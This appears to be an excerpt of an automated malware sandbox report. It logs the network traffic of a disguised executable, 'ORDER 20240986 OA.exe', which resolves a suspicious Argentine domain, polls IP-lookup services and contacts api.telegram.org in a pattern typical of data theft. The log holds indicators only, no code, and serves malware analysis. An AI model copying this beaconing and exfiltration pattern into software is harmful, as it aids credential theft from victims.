                                                                                                                                                Nov 21, 2024 09:01:26.473582029 CET4979480192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:26.923718929 CET49800443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:26.923824072 CET44349800188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:26.923912048 CET49800443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:26.928208113 CET49800443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:26.928241014 CET44349800188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:28.189861059 CET44349800188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:28.189944983 CET49800443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:28.193695068 CET49800443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:28.193717957 CET44349800188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:28.194005966 CET44349800188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:28.198031902 CET49800443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:28.239336014 CET44349800188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:28.665993929 CET44349800188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:28.666071892 CET44349800188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:28.666169882 CET49800443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:28.671993971 CET49800443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:28.678023100 CET4979480192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:28.797528982 CET8049794158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:29.078656912 CET8049794158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:29.081666946 CET49806443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:29.081727028 CET44349806188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:29.081809998 CET49806443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:29.082037926 CET49806443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:29.082052946 CET44349806188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:29.129872084 CET4979480192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:30.294297934 CET44349806188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:30.296341896 CET49806443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:30.296377897 CET44349806188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:30.740039110 CET44349806188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:30.740118027 CET44349806188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:30.740164995 CET49806443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:30.740811110 CET49806443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:30.744973898 CET4979480192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:30.746169090 CET4981280192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:30.864969969 CET8049794158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:30.865060091 CET4979480192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:30.865660906 CET8049812158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:30.865753889 CET4981280192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:30.865945101 CET4981280192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:30.985569000 CET8049812158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:32.249574900 CET8049812158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:32.251013994 CET49814443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:32.251060963 CET44349814188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:32.251130104 CET49814443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:32.251410007 CET49814443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:32.251425028 CET44349814188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:32.301732063 CET4981280192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:33.507550955 CET44349814188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:33.513370991 CET49814443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:33.513396978 CET44349814188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:33.960309029 CET44349814188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:33.960382938 CET44349814188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:33.960443020 CET49814443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:33.961101055 CET49814443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:33.965801001 CET4981980192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:34.085277081 CET8049819158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:34.085608006 CET4981980192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:34.085762024 CET4981980192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:34.205190897 CET8049819158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:35.369781017 CET8049819158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:35.371172905 CET49825443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:35.371232986 CET44349825188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:35.371308088 CET49825443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:35.371598959 CET49825443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:35.371613979 CET44349825188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:35.411140919 CET4981980192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:36.581744909 CET44349825188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:36.583626986 CET49825443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:36.583656073 CET44349825188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:37.027009964 CET44349825188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:37.027085066 CET44349825188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:37.027127981 CET49825443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:37.027545929 CET49825443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:37.031522036 CET4981980192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:37.032923937 CET4982980192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:37.152347088 CET8049829158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:37.152560949 CET4982980192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:37.152652025 CET8049819158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:37.152704954 CET4981980192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:37.154551029 CET4982980192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:37.274132013 CET8049829158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:38.386790037 CET8049829158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:38.388246059 CET49833443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:38.388278008 CET44349833188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:38.388353109 CET49833443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:38.388628960 CET49833443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:38.388643026 CET44349833188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:38.426824093 CET4982980192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:39.645545959 CET44349833188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:39.647083044 CET49833443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:39.647099018 CET44349833188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:40.101188898 CET44349833188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:40.101264954 CET44349833188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:40.101311922 CET49833443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:40.101864100 CET49833443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:40.105689049 CET4982980192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:40.106935024 CET4983880192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:40.225567102 CET8049829158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:40.225637913 CET4982980192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:40.226564884 CET8049838158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:40.226639032 CET4983880192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:40.226825953 CET4983880192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:40.346221924 CET8049838158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:41.537235022 CET8049838158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:41.538556099 CET49842443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:41.538599968 CET44349842188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:41.538676023 CET49842443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:41.538937092 CET49842443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:41.538964033 CET44349842188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:41.583327055 CET4983880192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:42.796660900 CET44349842188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:42.798542023 CET49842443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:42.798556089 CET44349842188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:43.248239040 CET44349842188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:43.248302937 CET44349842188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:43.248361111 CET49842443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:43.248790026 CET49842443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:43.252341986 CET4983880192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:43.252940893 CET4984680192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:43.372113943 CET8049838158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:43.372174978 CET4983880192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:43.372358084 CET8049846158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:43.372428894 CET4984680192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:43.372589111 CET4984680192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:43.491966963 CET8049846158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:44.709273100 CET8049846158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:44.710530043 CET49851443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:44.710578918 CET44349851188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:44.710645914 CET49851443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:44.710942984 CET49851443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:44.710953951 CET44349851188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:44.755063057 CET4984680192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:45.967787027 CET44349851188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:45.969364882 CET49851443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:45.969397068 CET44349851188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:46.422755957 CET44349851188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:46.422811985 CET44349851188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:46.422864914 CET49851443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:46.423257113 CET49851443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:46.426615000 CET4984680192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:46.427571058 CET4985780192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:46.546613932 CET8049846158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:46.546705008 CET4984680192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:46.547076941 CET8049857158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:46.547152042 CET4985780192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:46.547331095 CET4985780192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:46.666829109 CET8049857158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:47.779884100 CET8049857158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:47.781289101 CET49859443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:47.781378031 CET44349859188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:47.781478882 CET49859443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:47.781759024 CET49859443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:47.781790972 CET44349859188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:47.833162069 CET4985780192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:49.085099936 CET44349859188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:49.086910009 CET49859443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:49.086946011 CET44349859188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:49.550198078 CET44349859188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:49.550285101 CET44349859188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:49.550476074 CET49859443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:49.551301003 CET49859443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:49.554986000 CET4985780192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:49.556106091 CET4986480192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:49.674812078 CET8049857158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:49.674985886 CET4985780192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:49.675604105 CET8049864158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:49.675688982 CET4986480192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:49.675864935 CET4986480192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:49.795280933 CET8049864158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:51.852545977 CET8049864158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:51.853885889 CET49870443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:51.853938103 CET44349870188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:51.854033947 CET49870443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:51.854269028 CET49870443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:51.854286909 CET44349870188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:51.895576954 CET4986480192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:53.067346096 CET44349870188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:53.077013016 CET49870443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:53.077034950 CET44349870188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:53.518049002 CET44349870188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:53.518145084 CET44349870188.114.96.3192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:53.518191099 CET49870443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:53.518687963 CET49870443192.168.2.4188.114.96.3
                                                                                                                                                Nov 21, 2024 09:01:53.554063082 CET4986480192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:53.674160004 CET8049864158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:53.674758911 CET4986480192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:53.787990093 CET49876443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:01:53.788049936 CET44349876149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:53.788121939 CET49876443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:01:53.788755894 CET49876443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:01:53.788772106 CET44349876149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:55.199254990 CET44349876149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:55.199350119 CET49876443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:01:55.201915026 CET49876443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:01:55.201929092 CET44349876149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:55.202250004 CET44349876149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:55.204348087 CET49876443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:01:55.247349977 CET44349876149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:55.710799932 CET44349876149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:55.710876942 CET44349876149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:55.710958004 CET49876443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:01:55.753279924 CET49876443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:02:02.189234972 CET4981280192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:02:02.409631968 CET49896443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:02:02.409687996 CET44349896149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:02:02.409802914 CET49896443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:02:02.410069942 CET49896443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:02:02.410084009 CET44349896149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:02:03.815562010 CET44349896149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:02:03.817956924 CET49896443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:02:03.817981958 CET44349896149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:02:03.818074942 CET49896443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:02:03.818093061 CET44349896149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:02:04.393543005 CET44349896149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:02:04.393627882 CET44349896149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:02:04.393732071 CET49896443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:02:04.394241095 CET49896443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:02:05.911046028 CET49902443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:02:05.911092997 CET44349902149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:02:05.911170959 CET49902443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:02:05.911406994 CET49902443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:02:05.911423922 CET44349902149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:02:07.378952980 CET44349902149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:02:07.426896095 CET49902443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:02:09.702475071 CET49902443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:02:09.702512980 CET44349902149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:02:09.702534914 CET49902443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:02:09.702545881 CET44349902149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:02:10.400235891 CET44349902149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:02:10.400331974 CET44349902149.154.167.220192.168.2.4
                                                                                                                                                Nov 21, 2024 09:02:10.400542021 CET49902443192.168.2.4149.154.167.220
                                                                                                                                                Nov 21, 2024 09:02:10.400824070 CET49902443192.168.2.4149.154.167.220
                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Nov 21, 2024 09:01:19.377253056 CET5287053192.168.2.41.1.1.1
                                                                                                                                                Nov 21, 2024 09:01:19.774369955 CET53528701.1.1.1192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:24.115865946 CET6294053192.168.2.41.1.1.1
                                                                                                                                                Nov 21, 2024 09:01:24.342747927 CET53629401.1.1.1192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:26.694552898 CET6394553192.168.2.41.1.1.1
                                                                                                                                                Nov 21, 2024 09:01:26.922863960 CET53639451.1.1.1192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:53.555427074 CET5674953192.168.2.41.1.1.1
                                                                                                                                                Nov 21, 2024 09:01:53.787127972 CET53567491.1.1.1192.168.2.4
                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Nov 21, 2024 09:01:19.377253056 CET192.168.2.41.1.1.10xd064Standard query (0)sierrassinfinusadas.com.arA (IP address)IN (0x0001)false
                                                                                                                                                Nov 21, 2024 09:01:24.115865946 CET192.168.2.41.1.1.10xbdb5Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                Nov 21, 2024 09:01:26.694552898 CET192.168.2.41.1.1.10x9c40Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                Nov 21, 2024 09:01:53.555427074 CET192.168.2.41.1.1.10xaf18Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Nov 21, 2024 09:01:19.774369955 CET1.1.1.1192.168.2.40xd064No error (0)sierrassinfinusadas.com.ar167.250.5.91A (IP address)IN (0x0001)false
                                                                                                                                                Nov 21, 2024 09:01:24.342747927 CET1.1.1.1192.168.2.40xbdb5No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Nov 21, 2024 09:01:24.342747927 CET1.1.1.1192.168.2.40xbdb5No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                Nov 21, 2024 09:01:24.342747927 CET1.1.1.1192.168.2.40xbdb5No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                Nov 21, 2024 09:01:24.342747927 CET1.1.1.1192.168.2.40xbdb5No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                Nov 21, 2024 09:01:24.342747927 CET1.1.1.1192.168.2.40xbdb5No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                Nov 21, 2024 09:01:24.342747927 CET1.1.1.1192.168.2.40xbdb5No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                Nov 21, 2024 09:01:26.922863960 CET1.1.1.1192.168.2.40x9c40No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                Nov 21, 2024 09:01:26.922863960 CET1.1.1.1192.168.2.40x9c40No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                Nov 21, 2024 09:01:53.787127972 CET1.1.1.1192.168.2.40xaf18No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                • sierrassinfinusadas.com.ar
                                                                                                                                                • reallyfreegeoip.org
                                                                                                                                                • api.telegram.org
                                                                                                                                                • checkip.dyndns.org
                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.449794158.101.44.242807832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 21, 2024 09:01:24.468339920 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Nov 21, 2024 09:01:26.018054962 CET320INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:25 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 103
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 49f7f884e6989c8aaebdabf373bbcdaf
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                                Nov 21, 2024 09:01:26.024735928 CET127OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Nov 21, 2024 09:01:26.421597958 CET320INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:26 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 103
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 514103ea0b735a733601c1159206d7d1
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                                Nov 21, 2024 09:01:28.678023100 CET127OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Nov 21, 2024 09:01:29.078656912 CET320INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:28 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 103
                                                                                                                                                Connection: keep-alive
